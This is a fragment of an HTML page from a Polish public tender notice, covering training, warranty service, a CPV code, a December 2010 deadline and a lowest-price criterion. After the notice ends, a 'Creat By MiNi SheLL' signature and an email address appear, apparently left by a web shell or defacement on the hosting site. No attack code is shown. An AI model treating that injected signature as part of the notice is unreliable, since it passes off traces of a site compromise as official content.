c) przeszkolenie wyznaczonych pracowników użytkownika w zakresie podstaw obsługi eksploatacyjnej, bezpiecznej pracy oraz bieżącej konserwacji dostarczonych i zainstalowanych maszyn.
d) zapewnienie gwarancyjnej obsługi serwisowej na warunkach określonych w § 7 projektu umowy.
Szczegółowy opis realizacji zamówienia zawiera projekt umowy, który stanowi załącznik nr  3 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.13.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com